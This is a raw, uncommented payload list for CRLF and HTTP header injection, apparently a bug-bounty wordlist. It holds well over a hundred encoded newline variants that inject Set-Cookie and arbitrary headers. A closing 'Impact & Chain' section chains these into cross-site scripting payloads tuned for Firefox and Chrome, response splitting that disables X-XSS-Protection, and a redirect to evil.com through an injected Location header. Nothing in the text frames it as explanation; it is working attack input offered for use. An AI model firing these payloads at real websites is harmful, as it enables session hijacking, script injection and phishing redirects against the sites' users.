test.com:80 

%0Acrlfi:rivutest

%0D%0Aset-cookie:%20RIVUDON

?t=%0d%0aSet-Cookie:%20lang=n%3b

%0Aset-cookie:%20hello=how

嚍嚊Set-Cookie:crlfinjection=crlfinjection

%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection

嗍嗊Set-Cookie:whoami=crlfinjection嗍嗊嗍嗊嗍嗊嗍嗊嗚script嗾alert(1);嗚/script嗾

%E5%98%8D%E5%98%8ASet-Cookie:whoami=crlfinjection%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE

/%0Acrlfi:rivudon

/%0d%0aSet-Cookie:CRLF=RIVUDON
/%0a%0dSet-Cookie:CRLF=RIVUDON

/%0D%0Acrlf:%20injection

/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection

%0Acrlfi:rivudon
%0A%20crlfi:rivudon
%20%0Acrlfi:rivudon
%23%OAcrlfi:rivudon
%E5%98%8A%E5%98%8Dcrlfi:rivudon
%E5%98%8A%E5%98%8D%0Acrlfi:rivudon
%3F%0Acrlfi:rivudon
crlf%0Acrlfi:rivudon
crlf%0A%20crlfi:rivudon
crlf%20%0Acrlfi:rivudon
crlf%23%OAcrlfi:rivudon
crlf%E5%98%8A%E5%98%8Dcrlfi:rivudon
crlf%E5%98%8A%E5%98%8D%0Acrlfi:rivudon
crlf%3F%0Acrlfi:rivudon
%0Dcrlfi:rivudon
%0D%20crlfi:rivudon
%20%0Dcrlfi:rivudon
%23%0Dcrlfi:rivudon
%23%0Acrlfi:rivudon
%E5%98%8A%E5%98%8Dcrlfi:rivudon
%E5%98%8A%E5%98%8D%0Dcrlfi:rivudon
%3F%0Dcrlfi:rivudon
crlf%0Dcrlfi:rivudon
crlf%0D%20crlfi:rivudon
crlf%20%0Dcrlfi:rivudon
crlf%23%0Dcrlfi:rivudon
crlf%23%0Acrlfi:rivudon
crlf%E5%98%8A%E5%98%8Dcrlfi:rivudon
crlf%E5%98%8A%E5%98%8D%0Dcrlfi:rivudon
crlf%3F%0Dcrlfi:rivudon
%0D%0Acrlfi:rivudon
%0D%0A%20crlfi:rivudon
%20%0D%0Acrlfi:rivudon
%23%0D%0Acrlfi:rivudon
\r\ncrlfi:rivudon
 \r\n crlfi:rivudon
\r\n crlfi:rivudon
%5cr%5cncrlfi:rivudon
%E5%98%8A%E5%98%8Dcrlfi:rivudon
%E5%98%8A%E5%98%8D%0D%0Acrlfi:rivudon
%3F%0D%0Acrlfi:rivudon
crlf%0D%0Acrlfi:rivudon
crlf%0D%0A%20crlfi:rivudon
crlf%20%0D%0Acrlfi:rivudon
crlf%23%0D%0Acrlfi:rivudon
crlf\r\ncrlfi:rivudon
crlf%5cr%5cncrlfi:rivudon
crlf%E5%98%8A%E5%98%8Dcrlfi:rivudon
crlf%E5%98%8A%E5%98%8D%0D%0Acrlfi:rivudon
crlf%3F%0D%0Acrlfi:rivudon
%0D%0A%09crlfi:rivudon
crlf%0D%0A%09crlfi:rivudon
%250Acrlfi:rivudon
%25250Acrlfi:rivudon
%%0A0Acrlfi:rivudon
%25%30Acrlfi:rivudon
%25%30%61crlfi:rivudon
%u000Acrlfi:rivudon
//www.evil.com/%2F%2E%2E%0D%0Acrlfi:rivudon
/www.evil.com/%2E%2E%2F%0D%0Acrlfi:rivudon
/rivudon.com/%2F..%0D%0Acrlfi:rivudon
/%0Acrlfi:rivudon
/%0A%20crlfi:rivudon
/%20%0Acrlfi:rivudon
/%23%OAcrlfi:rivudon
/%E5%98%8A%E5%98%8Dcrlfi:rivudon
/%E5%98%8A%E5%98%8D%0Acrlfi:rivudon
/%3F%0Acrlfi:rivudon
/crlf%0Acrlfi:rivudon
/crlf%0A%20crlfi:rivudon
/crlf%20%0Acrlfi:rivudon
/crlf%23%OAcrlfi:rivudon
/crlf%E5%98%8A%E5%98%8Dcrlfi:rivudon
/crlf%E5%98%8A%E5%98%8D%0Acrlfi:rivudon
/crlf%3F%0Acrlfi:rivudon
/%0Dcrlfi:rivudon
/%0D%20crlfi:rivudon
/%20%0Dcrlfi:rivudon
/%23%0Dcrlfi:rivudon
/%23%0Acrlfi:rivudon
/%E5%98%8A%E5%98%8Dcrlfi:rivudon
/%E5%98%8A%E5%98%8D%0Dcrlfi:rivudon
/%3F%0Dcrlfi:rivudon
/crlf%0Dcrlfi:rivudon
/crlf%0D%20crlfi:rivudon
/crlf%20%0Dcrlfi:rivudon
/crlf%23%0Dcrlfi:rivudon
/crlf%23%0Acrlfi:rivudon
/crlf%E5%98%8A%E5%98%8Dcrlfi:rivudon
/crlf%E5%98%8A%E5%98%8D%0Dcrlfi:rivudon
/crlf%3F%0Dcrlfi:rivudon
/%0D%0Acrlfi:rivudon
/%0D%0A%20crlfi:rivudon
/%20%0D%0Acrlfi:rivudon
/%23%0D%0Acrlfi:rivudon
/\r\ncrlfi:rivudon
/ \r\n crlfi:rivudon
/\r\n crlfi:rivudon
/%5cr%5cncrlfi:rivudon
/%E5%98%8A%E5%98%8Dcrlfi:rivudon
/%E5%98%8A%E5%98%8D%0D%0Acrlfi:rivudon
/%3F%0D%0Acrlfi:rivudon
/crlf%0D%0Acrlfi:rivudon
/crlf%0D%0A%20crlfi:rivudon
/crlf%20%0D%0Acrlfi:rivudon
/crlf%23%0D%0Acrlfi:rivudon
/crlf\r\ncrlfi:rivudon
/crlf%5cr%5cncrlfi:rivudon
/crlf%E5%98%8A%E5%98%8Dcrlfi:rivudon
/crlf%E5%98%8A%E5%98%8D%0D%0Acrlfi:rivudon
/crlf%3F%0D%0Acrlfi:rivudon
/%0D%0A%09crlfi:rivudon
/crlf%0D%0A%09crlfi:rivudon
/%250Acrlfi:rivudon
/%25250Acrlfi:rivudon
/%%0A0Acrlfi:rivudon
/%25%30Acrlfi:rivudon
/%25%30%61crlfi:rivudon
/%u000Acrlfi:rivudon
//www.evil.com/%2F%2E%2E%0D%0Acrlfi:rivudon
/www.evil.com/%2E%2E%2F%0D%0Acrlfi:rivudon
/rivudon.com/%2F..%0D%0Acrlfi:rivudon

Impact & Chain

XSS -> 

/%0ASet-Cookie: crlf%0A%0A<img src=x onerror=prompt(document.domain)>

Firefox

/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a&lt;svg%20onload=alert(document.domain)&gt;%0d%0a0%0d%0a/%2e%2e

Chrome

/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a&lt;svg%20onload=alert(document.domain)&gt;%0d%0a0%0d%0a/%2f%2e%2e

Redirecting Website -> %0d%0aLocation:%20http://evil.com
